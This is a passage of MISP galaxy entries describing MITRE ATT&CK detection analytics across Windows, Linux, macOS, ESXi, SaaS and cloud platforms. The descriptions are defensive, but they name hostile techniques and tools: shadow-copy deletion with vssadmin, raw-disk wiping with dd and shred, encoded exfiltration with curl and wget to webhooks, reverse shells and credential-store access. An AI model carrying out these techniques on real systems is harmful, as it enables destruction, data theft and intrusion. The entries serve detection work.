Analytic 0393 - AN0393

Detects deletion of suspicious files (e.g., payloads, temp exes, scripts) via rm, unlink, or secure deletion tools like shred, especially when performed by unexpected users or shortly after execution.

Internal MISP references

UUID 874f0437-1aab-4cfe-a30a-7586c0602b6f which can be used as unique global reference for Analytic 0393 - AN0393 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0393
mitre_platforms ['Linux']

Analytic 0339 - AN0339

Deletion or disablement of user accounts in platforms like Okta, Salesforce, or Zoom with anomalies in admin session attributes or mass actions within short duration.

Internal MISP references

UUID af7bff30-45c5-4baf-9ced-68208b7ae836 which can be used as unique global reference for Analytic 0339 - AN0339 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0339
mitre_platforms ['SaaS']

Analytic 0933 - AN0933

Process chains that use native utilities (vssadmin, wbadmin, diskshadow, bcdedit, REAgentC, wmic) with arguments to delete shadow copies, disable recovery, or remove backup catalogs

Internal MISP references

UUID decb2be7-1a0a-46dd-ab48-cf6258c0185e which can be used as unique global reference for Analytic 0933 - AN0933 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0933
mitre_platforms ['Windows']

Analytic 0443 - AN0443

Automated and repetitive triggering of SMS messages through OTP/account verification fields on SaaS platforms, leveraging background messaging APIs such as Twilio, AWS SNS, or Amazon Cognito to generate traffic toward attacker-controlled numbers.

Internal MISP references

UUID 5beb62fd-7dac-485f-828c-72cf151124a8 which can be used as unique global reference for Analytic 0443 - AN0443 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0443
mitre_platforms ['SaaS']

Analytic 0434 - AN0434

Non-standard or rare users/locations issue CLI commands like "show clock detail" or "show timezone"; optionally followed by configuration of time/timezone or NTP sources. AAA/TACACS+ accounting and syslog correlate execution to identity, source IP, and privilege level.

Internal MISP references

UUID 99ab1534-79b5-4660-83ed-3604bcb320f2 which can be used as unique global reference for Analytic 0434 - AN0434 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0434
mitre_platforms ['Network Devices']

Analytic 0344 - AN0344

Detects mounting of external volumes followed by high-volume or sensitive file access via Finder, terminal, or third-party apps (e.g., rsync, zip).

Internal MISP references

UUID acaabb0b-6cfc-45cd-8bd9-08ad49e1096c which can be used as unique global reference for Analytic 0344 - AN0344 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0344
mitre_platforms ['macOS']

Analytic 0534 - AN0534

Suspicious sign-ins to Graph API or sensitive resources using non-browser scripting agents (e.g., Python, PowerShell), often for programmatic access to mailbox or OneDrive content.

Internal MISP references

UUID 00b2801f-752e-4b70-95fd-c2644ccef671 which can be used as unique global reference for Analytic 0534 - AN0534 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0534
mitre_platforms ['SaaS']

Analytic 0354 - AN0354

Use of command-line like ip ssh pubkey-chain to bind SSH keys to privileged accounts on routers or switches.

Internal MISP references

UUID 4d8e89c0-fbde-43fc-adc4-d2f50bec3193 which can be used as unique global reference for Analytic 0354 - AN0354 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0354
mitre_platforms ['Network Devices']

Analytic 0345 - AN0345

Process invokes a standard encoder (e.g., PowerShell -enc, certutil -encode, base64 via .NET/Invoke-Expression) or emits long Base64/hex literals → shortly followed by outbound network egress with high bytes_out:bytes_in ratio or HTTP headers/payloads containing Base64/MIME blocks.

Internal MISP references

UUID 861ee805-c979-44c9-8b0c-86bd3a6f5872 which can be used as unique global reference for Analytic 0345 - AN0345 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0345
mitre_platforms ['Windows']

Analytic 0543 - AN0543

Detects registry and Group Policy modifications that disable or weaken MFA, suspicious PowerShell usage modifying MFA-related attributes, and anomalous login sessions succeeding without expected MFA challenge.

Internal MISP references

UUID 97cb8df9-f100-4a64-802a-1aa2f45c26eb which can be used as unique global reference for Analytic 0543 - AN0543 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0543
mitre_platforms ['Windows']

Analytic 0435 - AN0435

Detection focuses on adversaries placing or modifying malicious dylibs in locations searched by legitimate applications. From the defender’s perspective, observable patterns include unexpected creation or modification of dylib files in application bundle paths, unusual module loads by processes compared to historical baselines, and execution of applications loading dylibs from suspicious directories (e.g., /tmp, user-controlled paths). Correlation across file system changes, process execution, and module loads provides high-fidelity detection.

Internal MISP references

UUID a1e502e2-d940-4c71-9eac-893e7a3025e3 which can be used as unique global reference for Analytic 0435 - AN0435 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0435
mitre_platforms ['macOS']

Analytic 0453 - AN0453

Detect anomalous OAuth or SSO logins that repeatedly generate MFA challenges, particularly where MFA approvals are denied or timed out by the user.

Internal MISP references

UUID e96b0210-f7d5-43ac-bf73-893f243f6015 which can be used as unique global reference for Analytic 0453 - AN0453 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0453
mitre_platforms ['SaaS']

Analytic 0364 - AN0364

Domain account enumeration using ldapsearch, samba tools (e.g., 'wbinfo -u'), or winbindd lookups.

Internal MISP references

UUID 4bad86cf-6cab-46f4-8748-28dc8c8ec81b which can be used as unique global reference for Analytic 0364 - AN0364 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0364
mitre_platforms ['Linux']

Analytic 0346 - AN0346

Shell/utility (base64, xxd -p, od, openssl enc -base64, python/perl base64 libraries) encodes data → subsequent outbound connections (curl/wget/bash TCP, socat, python requests) with high asymmetry or Base64/MIME blobs in HTTP/DNS payloads.

Internal MISP references

UUID 904100f0-1af9-4ded-89be-dfda7180bcbc which can be used as unique global reference for Analytic 0346 - AN0346 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0346
mitre_platforms ['Linux']

Analytic 0436 - AN0436

Unusual processes (e.g., powershell.exe, wscript.exe, mshta.exe) posting data to webhook endpoints (Discord, Slack, webhook.site) using HTTP POST/PUT requests. Defender perspective: suspicious process lineage followed by outbound HTTPS traffic to webhook domains.

Internal MISP references

UUID 98bd8e15-68ea-43a3-982b-66fcd1142c9a which can be used as unique global reference for Analytic 0436 - AN0436 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0436
mitre_platforms ['Windows']

Analytic 0643 - AN0643

Detects execution of binaries signed with unusual or recently issued certificates, correlation of process execution with abnormal publisher metadata, and mismatched certificate chains. Monitors for revoked or unknown code signing certificates used in high-privilege contexts.

Internal MISP references

UUID b5d77678-fff4-41cd-9e77-d3f82243240a which can be used as unique global reference for Analytic 0643 - AN0643 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0643
mitre_platforms ['Windows']

Analytic 0463 - AN0463

Process creates a raw/packet socket and attaches a (e)BPF filter (setsockopt SO_ATTACH_FILTER/ATTACH_BPF or bpf(BPF_PROG_LOAD)). Immediately after a matching inbound packet, the same process binds/connects outward to a remote host (reverse shell or beacon).

Internal MISP references

UUID c19f8f89-76f9-4345-8bb6-a065fba50bff which can be used as unique global reference for Analytic 0463 - AN0463 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0463
mitre_platforms ['Linux']

Analytic 0634 - AN0634

Unusual daemons or user processes binding/listening on ports outside of standard ranges, or initiating client connections using mismatched protocol/port pairings.

Internal MISP references

UUID dba32c3a-1ae7-46a4-9b04-d011f37aa801 which can be used as unique global reference for Analytic 0634 - AN0634 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0634
mitre_platforms ['Linux']

Analytic 0437 - AN0437

Processes such as curl, wget, or custom scripts initiating POST requests to webhook endpoints with encoded or bulk data. Defender perspective: abnormal chaining of file compression or access followed by outbound data to webhook URLs.

Internal MISP references

UUID 053dd0c5-9746-46ea-bdeb-b385bf5cbbf8 which can be used as unique global reference for Analytic 0437 - AN0437 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0437
mitre_platforms ['Linux']

Analytic 0473 - AN0473

Adversary installs or modifies email content filters or transport scripts (e.g., Postfix milter, Sendmail milter, Exim filters) using shell access or configuration manipulation.

Internal MISP references

UUID 2c64ece9-c40f-4d1a-babf-106f587454d0 which can be used as unique global reference for Analytic 0473 - AN0473 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0473
mitre_platforms ['Linux']

Analytic 0374 - AN0374

User-mode application uses flock() or NSDistributedLock to gain exclusive access to a resource file (e.g., /tmp/guard.lock), conditional logic alters execution if already locked.

Internal MISP references

UUID 4ab12b3f-5c6a-42a6-8d9c-c10b7e814986 which can be used as unique global reference for Analytic 0374 - AN0374 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0374
mitre_platforms ['macOS']

Analytic 0347 - AN0347

Processes use base64/xxd/openssl/python Objective‑C APIs to encode data (seen in EndpointSecurity exec events or Unified Logs) → quick outbound connections with large bytes_out or HTTP POSTs carrying Base64/MIME bodies.

Internal MISP references

UUID 5eefb166-8f2b-45e0-b5c8-bf71984dec08 which can be used as unique global reference for Analytic 0347 - AN0347 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0347
mitre_platforms ['macOS']

Analytic 0743 - AN0743

Background launch agents/daemons with high CPU use and network access to external mining services.

Internal MISP references

UUID 8cbeecbb-429f-4f30-9f42-266aaa7b2c0f which can be used as unique global reference for Analytic 0743 - AN0743 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0743
mitre_platforms ['macOS']

Analytic 0734 - AN0734

Detects JavaScript for Automation (JXA) via osascript or compiled scripts using OSAKit APIs. Flags execution involving system modification, inter-process scripting, or browser abuse.

Internal MISP references

UUID af3dff40-40be-40dd-9a0e-a47cf052880b which can be used as unique global reference for Analytic 0734 - AN0734 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0734
mitre_platforms ['macOS']

Analytic 0834 - AN0834

Sequential behavioral chain of privilege escalation through permission modification: (1) Process creation of permission-modifying utilities (icacls, takeown, attrib, cacls), (2) Correlation with unusual user context or timing, (3) DACL modification events targeting sensitive files/directories, (4) Subsequent file access or modification attempts indicating successful privilege bypass

Internal MISP references

UUID 0669b8b5-8888-45aa-acf8-819dfb7d00a2 which can be used as unique global reference for Analytic 0834 - AN0834 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0834
mitre_platforms ['Windows']

Analytic 0348 - AN0348

ESXi shell (BusyBox) or VMware utilities (openssl, python if present) used to Base64/hex encode data from datastore or config files → followed by abnormal egress from the host (NSX/flow logs) with asymmetric bytes_out or HTTPS posts to non-management endpoints.

Internal MISP references

UUID 1b53dd1b-c98e-4b25-a7fd-70dad586ebf1 which can be used as unique global reference for Analytic 0348 - AN0348 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0348
mitre_platforms ['ESXi']

Analytic 0384 - AN0384

Unusual direct disk access attempts (e.g., use of \.\PhysicalDrive notation), abnormal writes to MBR/boot sectors, and installation of kernel drivers that grant raw disk access. Correlate anomalous process creation with disk modification attempts and driver loads.

Internal MISP references

UUID 5dc85538-115c-4c56-878a-39caaba91e74 which can be used as unique global reference for Analytic 0384 - AN0384 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0384
mitre_platforms ['Windows']

Analytic 0843 - AN0843

A source performs a short closed-port sequence; the host then modifies iptables/nftables/ufw rules or starts a daemon binding a new socket, followed by a successful connection from the same source.

Internal MISP references

UUID 7bf8954f-5028-419d-b93f-9c6bfe6e5086 which can be used as unique global reference for Analytic 0843 - AN0843 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0843
mitre_platforms ['Linux']

Analytic 0483 - AN0483

Forged cookies in IaaS environments may appear as authentication attempts that bypass MFA, leveraging AssumeRole or session APIs with cookies that were never legitimately issued. Defenders should correlate cloud logs for cookie-based sessions without prior valid authentication, often followed by resource access from unfamiliar IP addresses.

Internal MISP references

UUID 9a6089cc-92a7-48ea-b4a4-4d4d2b6489e3 which can be used as unique global reference for Analytic 0483 - AN0483 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0483
mitre_platforms ['IaaS']

Analytic 0438 - AN0438

Unexpected apps or scripts (osascript, curl, Automator workflows) exfiltrating data via webhooks. Defender perspective: correlation of clipboard/file read operations followed by HTTPS POST traffic to webhook services.

Internal MISP references

UUID d7f9b07f-401c-4685-a014-6a824f95f866 which can be used as unique global reference for Analytic 0438 - AN0438 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0438
mitre_platforms ['macOS']

Analytic 0934 - AN0934

Shell utilities or scripts deleting /etc/systemd/system/rescue.target, /etc/fstab backups, or /boot/efi partitions; chattr used to block snapshot auto-recovery

Internal MISP references

UUID 135452f6-c760-42a6-8a3f-d09c33f05369 which can be used as unique global reference for Analytic 0934 - AN0934 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0934
mitre_platforms ['Linux']

Analytic 0394 - AN0394

Detects removal of adversary artifacts via rm, unlink, or secure tools, with focus on shell sessions, temp files, and modified LaunchAgents or system directories.

Internal MISP references

UUID 175bf607-fca6-4555-a30b-3d6cd4cfe876 which can be used as unique global reference for Analytic 0394 - AN0394 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0394
mitre_platforms ['macOS']

Analytic 0493 - AN0493

Detects adversary exploitation of authentication mechanisms or credential validation processes. Defender perspective includes forged Kerberos tickets (e.g., MS14-068), abnormal LSASS memory access, replayed authentication attempts, and unexpected crashes of authentication services. Multi-event correlation ties exploitation attempts to abnormal process creation, service instability, and suspicious authentication events.

Internal MISP references

UUID 2d4a40e4-359f-49ac-9e3f-58e29497aa41 which can be used as unique global reference for Analytic 0493 - AN0493 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0493
mitre_platforms ['Windows']

Analytic 0439 - AN0439

VMware services or management daemons generating HTTP POST requests to webhook endpoints, chained with unusual datastore or log access. Defender perspective: exfiltration from VM logs or disk images over webhook URLs.

Internal MISP references

UUID 37166782-8770-4812-b70c-27f3c705489b which can be used as unique global reference for Analytic 0439 - AN0439 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0439
mitre_platforms ['ESXi']

Analytic 0349 - AN0349

Unusual modification or creation of loginwindow-related plist files in '~/Library/Preferences/ByHost' correlated with unauthorized application paths and execution upon login.

Internal MISP references

UUID 67d1900f-9e02-4290-a14c-6d32be508d19 which can be used as unique global reference for Analytic 0349 - AN0349 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0349
mitre_platforms ['macOS']

Analytic 0943 - AN0943

Detects creation of scheduled tasks via at.exe or WMI Win32_ScheduledJob class, followed by execution of anomalous processes by svchost.exe or taskeng.exe.

Internal MISP references

UUID b9f79a81-9fee-47f2-bef8-a9f64fde935e which can be used as unique global reference for Analytic 0943 - AN0943 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0943
mitre_platforms ['Windows']

Analytic 0553 - AN0553

Rule manipulation through local email clients (e.g., Evolution, Thunderbird) or server-side filtering scripts (e.g., sieve) creating conditions to move or discard emails with security-related keywords.

Internal MISP references

UUID 487d9ddf-a790-4adc-9be4-ec5651e790f1 which can be used as unique global reference for Analytic 0553 - AN0553 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0553
mitre_platforms ['Linux']

Analytic 0535 - AN0535

Detection of attempts to disable or tamper with Windows Event Logging. This includes stopping or disabling the EventLog service, modifying registry keys related to EventLog and Autologger, using auditpol or wevtutil to disable categories or clear audit policies, and detecting suspicious gaps or resets in event logs. Defenders observe registry changes, service state changes, process execution of disabling commands, and anomalies in event record sequences.

Internal MISP references

UUID 705168ad-1701-453c-9aea-c75029492b89 which can be used as unique global reference for Analytic 0535 - AN0535 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0535
mitre_platforms ['Windows']

Analytic 0355 - AN0355

Adversary renames LOLBINs or deploys binaries with spoofed file names, internal PE metadata, or misleading icons to appear legitimate. File creation is followed by execution or service registration inconsistent with known usage.

Internal MISP references

UUID e3d982ec-2729-4e98-b340-affa13096fd6 which can be used as unique global reference for Analytic 0355 - AN0355 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0355
mitre_platforms ['Windows']

Analytic 0356 - AN0356

Adversary drops renamed binaries in uncommon directories (e.g., /tmp, /dev/shm) or uses special characters in names (e.g., trailing space, Unicode RLO). Execution or cronjob registration follows shortly after file drop.

Internal MISP references

UUID 3191336e-8cdb-4d41-80a4-aa2ab869f7bf which can be used as unique global reference for Analytic 0356 - AN0356 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0356
mitre_platforms ['Linux']

Analytic 0635 - AN0635

Applications making outbound connections on non-standard ports or launchd services bound to ports inconsistent with system baselines.

Internal MISP references

UUID 785c44d0-7e5b-4d3e-a3cd-0c5e96b8891b which can be used as unique global reference for Analytic 0635 - AN0635 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0635
mitre_platforms ['macOS']

Analytic 0536 - AN0536

Drive enumeration using PowerShell (Get-PSDrive), wmic logicaldisk, or Win32 API indicative of local volume enumeration by non-admin users or executed outside of baseline system inventory scripts.

Internal MISP references

UUID 9ffd3332-fcc0-440d-b717-ef98e140c543 which can be used as unique global reference for Analytic 0536 - AN0536 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0536
mitre_platforms ['Windows']

Analytic 0563 - AN0563

CLI-based execution of interface and routing discovery commands (e.g., show ip interface, show arp, show route) over Telnet, SSH, or console.

Internal MISP references

UUID e7debe02-4326-48ae-aa22-59c2a847d3e7 which can be used as unique global reference for Analytic 0563 - AN0563 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0563
mitre_platforms ['Network Devices']

Analytic 0653 - AN0653

Abnormal usage of Preview, ImageMagick, or binary editors to alter images/documents, followed by exfiltration or outbound connections with mismatched file MIME types or payload structure.

Internal MISP references

UUID eb6edb6d-9684-4ef7-96b2-13c087276d80 which can be used as unique global reference for Analytic 0653 - AN0653 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0653
mitre_platforms ['macOS']

Analytic 0365 - AN0365

Domain group and user enumeration via dscl or dscacheutil, or queries to directory services from non-admin endpoints.

Internal MISP references

UUID ef50b854-172a-457b-9d0e-c95d9835eaaa which can be used as unique global reference for Analytic 0365 - AN0365 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0365
mitre_platforms ['macOS']

Analytic 0537 - AN0537

Abnormal use of lsblk, fdisk -l, lshw -class disk, or parted by non-admin users or within non-interactive shells suggests suspicious disk enumeration activity.

Internal MISP references

UUID 1a7052d7-84f1-4116-bdb1-49bbe8709e3d which can be used as unique global reference for Analytic 0537 - AN0537 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0537
mitre_platforms ['Linux']

Analytic 0735 - AN0735

Detects Node.js or JavaScript interpreter execution from web shells, cron jobs, or local users. Correlates execution with reverse shell behavior, file modifications, or abnormal outbound connections.

Internal MISP references

UUID 26520d1c-1e0a-443b-817e-7ec1846a0476 which can be used as unique global reference for Analytic 0735 - AN0735 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0735
mitre_platforms ['Linux']

Analytic 0573 - AN0573

Detects attempts to enumerate VMs via hypervisor tools like virsh, VBoxManage, or qemu-img. Defender correlates suspicious command invocations with parent process lineage and unexpected users.

Internal MISP references

UUID 753ec5a6-9327-452e-ab9c-62b7206c24aa which can be used as unique global reference for Analytic 0573 - AN0573 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0573
mitre_platforms ['Linux']

Analytic 0357 - AN0357

Adversary creates disguised launch daemons or apps with misleading names and bundle metadata (e.g., Info.plist values inconsistent with binary path or icon). Launch is correlated with user logon or persistence setup.

Internal MISP references

UUID 7ebea786-db9c-439d-9caf-d0dd740047f3 which can be used as unique global reference for Analytic 0357 - AN0357 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0357
mitre_platforms ['macOS']

Analytic 0753 - AN0753

Use of cloud-based bastion or VM console session followed by commands that initiate outbound SSH or RDP sessions from the cloud instance to other environments.

Internal MISP references

UUID dfabf07a-8179-43f5-abf6-699202c10343 which can be used as unique global reference for Analytic 0753 - AN0753 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0753
mitre_platforms ['IaaS']

Analytic 0375 - AN0375

Detection of the creation of VSCode or JetBrains CLI tunneling profiles followed by persistent remote access via IDE-integrated tunnels, potentially authenticated via GitHub or JetBrains accounts.

Internal MISP references

UUID e3517ec0-f12a-4f64-8d10-e6bc2677f7d7 which can be used as unique global reference for Analytic 0375 - AN0375 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0375
mitre_platforms ['Windows']

Analytic 0358 - AN0358

Adversary uses renamed container images, injects files into containers with misleading names or metadata (e.g., renamed system binaries), and executes them during startup or scheduled jobs.

Internal MISP references

UUID 6927a2ad-c56f-4e87-9392-6e3eef07e57e which can be used as unique global reference for Analytic 0358 - AN0358 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0358
mitre_platforms ['Containers']

Analytic 0538 - AN0538

Disk enumeration via diskutil list or system_profiler SPStorageDataType run outside of user login or not associated with system inventory tools

Internal MISP references

UUID a98fc9c5-9c4c-47c5-a773-d68b523c7304 which can be used as unique global reference for Analytic 0538 - AN0538 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0538
mitre_platforms ['macOS']

Analytic 0583 - AN0583

Registry modification of the LSA Authentication Packages key followed by LSASS loading a non-standard or unsigned DLL. This includes unusual write access to HKLM\SYSTEM\CurrentControlSet\Control\Lsa, especially during non-installation timeframes. Correlated with lsass.exe loading DLLs not present in baseline or lacking valid signatures.

Internal MISP references

UUID d415367c-3624-4a68-a2b7-4734662db190 which can be used as unique global reference for Analytic 0583 - AN0583 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0583
mitre_platforms ['Windows']

Analytic 0385 - AN0385

Processes invoking destructive commands (dd, shred, wipe) with raw device targets (e.g., /dev/sda, /dev/nvme0n1). Detect direct writes to disk partitions and abnormal superblock or bootloader modifications. Correlate shell execution with subsequent block device I/O.

Internal MISP references

UUID d442d480-cfb9-43cc-b959-2f81513b432d which can be used as unique global reference for Analytic 0385 - AN0385 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0385
mitre_platforms ['Linux']

Analytic 0835 - AN0835

Behavioral sequence of unauthorized privilege escalation via permission modification: (1) chmod/chown/setfacl process execution with suspicious parameters, (2) Targeting of critical system files or unusual permission values, (3) Correlation with non-privileged user context or unusual timing patterns, (4) Follow-on file access indicating successful permission bypass

Internal MISP references

UUID e268a6cb-2264-473e-9683-fb0f33ecd793 which can be used as unique global reference for Analytic 0835 - AN0835 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0835
mitre_platforms ['Linux']

Analytic 0853 - AN0853

Cloud workload exploitation leads to repeated container, service, or VM termination/restart, typically associated with CVE-based crash triggers or fuzzed payloads.

Internal MISP references

UUID f1aae71a-6460-4c08-9aa7-49743f766a71 which can be used as unique global reference for Analytic 0853 - AN0853 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0853
mitre_platforms ['IaaS']

Analytic 0395 - AN0395

Detects manual or scripted removal of logs, artifacts, or malware droppings via rm or PowerCLI in ESXi shell. Focus on deletions from /tmp/, /var/core/, or /scratch.

Internal MISP references

UUID 3f53ca22-5efe-43b3-8225-5fdd4b8a8194 which can be used as unique global reference for Analytic 0395 - AN0395 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0395
mitre_platforms ['ESXi']

Analytic 0539 - AN0539

Use of esxcli storage or vim-cmd vmsvc/getallvms by unusual sessions or through interactive shells unrelated to administrative maintenance tasks.

Internal MISP references

UUID 478e6298-d012-4337-b2ed-0f8d4909ee05 which can be used as unique global reference for Analytic 0539 - AN0539 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0539
mitre_platforms ['ESXi']

Analytic 0953 - AN0953

Defenders can detect suspicious reversion of cloud compute instances by monitoring for unusual snapshot restores, rollback actions, or ephemeral storage resets that occur outside expected administrative workflows. From a defender’s perspective, relevant detection chains include: a snapshot restore triggered by a new or rarely used account, a sequence of snapshot creation immediately followed by a restore and instance start, or rollbacks performed from anomalous geographic or network locations. These patterns may indicate attempts to remove forensic evidence or re-establish a clean execution state for persistence.

Internal MISP references

UUID 4eaeffc2-bdfa-427c-a009-daadee39457d which can be used as unique global reference for Analytic 0953 - AN0953 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0953
mitre_platforms ['IaaS']

Analytic 0935 - AN0935

ESXi shell or vim-cmd execution that deletes all VM snapshots using vmsvc/snapshot.removeall or rm on snapshot paths

Internal MISP references

UUID e2fb4be5-bd70-45d6-89ad-e687bc475285 which can be used as unique global reference for Analytic 0935 - AN0935 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0935
mitre_platforms ['ESXi']

Analytic 0359 - AN0359

Adversary places scripts or binaries with misleading names in /etc/rc.local.d or /var/spool/cron, or registers services with legitimate-sounding names not present in default ESXi builds.

Internal MISP references

UUID f3dfb562-94ef-44ea-be4f-17ac2d0771b5 which can be used as unique global reference for Analytic 0359 - AN0359 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0359
mitre_platforms ['ESXi']

Analytic 0593 - AN0593

Login to vSphere or ESXi hosts using domain accounts, especially those associated with vpxuser or unexpected group memberships.

Internal MISP references

UUID f931e587-28f8-4923-b054-98d6348dcafe which can be used as unique global reference for Analytic 0593 - AN0593 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0593
mitre_platforms ['ESXi']

Analytic 0636 - AN0636

VM services or management daemons communicating on ports not defined by VMware defaults, such as vpxa or hostd processes initiating traffic over high-numbered or unexpected ports.

Internal MISP references

UUID 4e3afe58-e384-4b9e-9137-adaa0bac72af which can be used as unique global reference for Analytic 0636 - AN0636 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0636
mitre_platforms ['ESXi']

Analytic 0663 - AN0663

Adversary gains shell access or uploads a malicious script to deface hosted web content in Nginx, Apache, or other services.

Internal MISP references

UUID 7b95ffd7-165d-4435-97b6-4508b9328d89 which can be used as unique global reference for Analytic 0663 - AN0663 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0663
mitre_platforms ['Linux']

Analytic 0366 - AN0366

Detection of suspicious access to cloud-native secret management systems (AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, HashiCorp Vault). Focuses on abnormal secret retrieval activity, such as secrets being accessed by unusual identities, from unexpected regions, outside business hours, or at high volume. Correlates API calls to secret retrieval with surrounding authentication events, role assumptions, and anomalous execution patterns.

Internal MISP references

UUID 90eca5d7-c330-4b86-bde6-de04019cbba7 which can be used as unique global reference for Analytic 0366 - AN0366 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0366
mitre_platforms ['IaaS']

Analytic 0736 - AN0736

Abuse of launchctl to execute or manage Launch Agents and Daemons. Defender perspective: correlation of suspicious plist file creation or modification in LaunchAgents/LaunchDaemons directories with subsequent execution of the launchctl command. Abnormal executable paths (e.g., /tmp, /Shared) or launchctl activity followed by network connections are highly suspicious.

Internal MISP references

UUID 0297fd45-97bc-4913-8d38-218eae431544 which can be used as unique global reference for Analytic 0736 - AN0736 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0736
mitre_platforms ['macOS']

Analytic 0367 - AN0367

Detects unusual outbound file transfer behavior using protocols like FTP, SMB, SMTP, or DNS, involving non-standard processes, off-hour activity, or uncommonly high volume.

Internal MISP references

UUID 1543bc4a-7614-417a-85b9-d67e3da0350c which can be used as unique global reference for Analytic 0367 - AN0367 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0367
mitre_platforms ['Windows']

Analytic 0763 - AN0763

Unusual TLS tunnels through ports not normally encrypted (e.g., TLS on port 8080, 53). Defender sees NetFlow/IPFIX or packet inspection indicating high-entropy traffic volumes and asymmetric client/server exchange ratios.

Internal MISP references

UUID 29a00bef-79bd-4eb9-bf92-01651cffe9b0 which can be used as unique global reference for Analytic 0763 - AN0763 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0763
mitre_platforms ['Network Devices']

Analytic 0673 - AN0673

Monitor for security commands and API calls interacting with the Keychain, as well as file access attempts to stored certificates and private keys in ~/Library/Keychains or /Library/Keychains.

Internal MISP references

UUID 62285936-d8a3-4b18-b3b4-a521fbef10ec which can be used as unique global reference for Analytic 0673 - AN0673 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
